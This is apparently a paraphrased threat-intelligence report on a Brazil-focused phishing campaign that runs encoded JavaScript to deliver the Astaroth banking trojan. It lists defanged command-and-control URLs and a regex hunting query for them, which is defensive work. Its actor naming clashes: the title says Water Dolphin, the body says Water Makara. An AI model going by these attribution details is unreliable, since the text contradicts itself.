Water Dolphin Utilizes Encoded JavaScript in Phishing Scheme, Focuses on Brazil Using Astaroth Malware

Figure 7 portrays the encoded JavaScript commands, decodable utilizing the unescape string function. The unlocked directives expose a malevolent URL. The variable _$_TLEN is defined as an array containing two strings: ‘[7 random characters]’, conceivably a method or function name, and the URL.

The domain name appears dubious and might partake in a phishing or malware delivery plot. Usage of GetObject function indicates an intent to execute or retrieve an object, possibly triggering other detrimental actions.

The GetObject function endeavors to retrieve and execute the object at the URL by invoking a method named “SXSPP29” on it. In case of an error during this process, it is quietly captured, and no action is taken. Successful execution of the JavaScript command enables the Astaroth C&C server to establish a stronghold on the endpoint.

Common traits and patterns are shared among the URLs. The URLs featuring the domain patrimoniosoberano[.]world imply association with the same domain whilst potentially leading to distinct subdomains or paths within that domain.

Each URL features a unique subdomain yet adheres to a comparable nomenclature:

• hxxps[://]pritonggopatrimoniosoberano[.]world/?5/
• hxxps[://]pritongongor[.]patrimoniosoberano[.]world/?5/
• hxxps[://]spunalu[.]patrimoniosoberano[.]world/?5/
• hxxps[://]sprunal[.]patrimoniosoberano[.]world/?5/

Moreover, each URL culminates with the similar path, /?5/. Evidently, there might be some uniformity in the resource they are aiming for or the structure of parameters within the URLs. This technique characterizes domain generation algorithm (DGA), widely employed by various malware strains to algorithmically generate numerous domain names.

According to the list of indicators of compromise (IoCs), the second-level domain (SDL) of the URLs display a similar format, potentially utilizing the same C&C servers as Astaroth. While Trend Micro has successfully thwarted recognized behaviors linked to this malware, it remains imperative for users to stay alert and cognizant of the risks posed by this phishing assault.

We are actively overseeing this breach campaign. At present, no significant payloads have been detected on the endpoints, courtesy of the existing countermeasure strategy against these behaviors. Trend Micro solutions effectively prevent this threat at the onset.

 Despite Astaroth’s classification as an aged banking trojan, its resurgence and continuous development render it a persistent threat. Beyond data theft, its repercussions extend to enduring harm to consumer trust, regulatory fines, augmented expenses stemming from operational disruptions and downtime, as well as recovery and rectification efforts.

Water Dolphin’s spear phishing strategy hinges on unsuspecting users interacting with the malicious files, emphasizing the pivotal role of human awareness. Organizations should also embrace optimal practices such as regular security drills, enforcement of robust password policies, implementation of multifactor authentication (MFA), up-to-date utilization of security solutions and software, and adherence to the principle of least privilege.

Trend Micro solutions have already identified, prevented, and lessened this danger:

• Email Security  includes a search query that can function as a filter to obstruct malevolent emails. It’s capable of recognizing and isolating deceptive emails before they get to users.

Safeguarding endpoints utilizing

• Apex One offers cutting-edge threat detection and response features to identify and alleviate suspicious activities like the execution of encoded JavaScript instructions.
• Cloud App Security provides an additional security layer for cloud-based email services such as Office 365 or Google Workspace, inspecting and obstructing malevolent attachments and links before they arrive in the inbox.
• Deep Security furnishes extensive security controls for networks, including real-time analysis and protection against threats.
• Deep Discovery Analyzer uses behavioral analysis and sandboxing to comprehend the conduct of JavaScript-encoded instructions and its probable repercussions.

Trend Micro’s solutions also incorporate Playbook rules that can be employed to obstruct, flag, and respond to dubious file names, for instance LNK files, which are frequently utilized in phishing schemes.

• Vision One boasts extended detection and response capabilities that continuously oversee the network for IoCs and unconventional behaviors. Vision One also offers Threat Insights that delivers comprehensive intelligence on threat actors, their operations, and methodologies, empowering organizations to preemptively defend their environments, mitigate risks, and respond efficiently to threats. Moreover, Vision One features the Search App function that can match or hunt the IoCs within the organization’s ecosystem.

Trend Micro Vision One Intelligence Reports App [IOC Sweeping]

[TAD Emerging Threat Analysis]: Encoded JavaScript instructions with malevolent URL in LATAM

Trend Micro Vision One Threat Insights App

               Threat Actor/s: Water Makara

               Emerging Threats: Surge in Obfuscated JavaScript Commands Executed via mshta.exe Targeting Brazil with Phishing Campaigns

Trend Micro Vision One Search App – Hunting Queries

Potential malevolent HTTPS request connecting to Astaroth’s C&C server:

request:/https://.*(.world|.org|.io|.net|.city|.com|.cfd|.xyz)(/?[0-9]/)/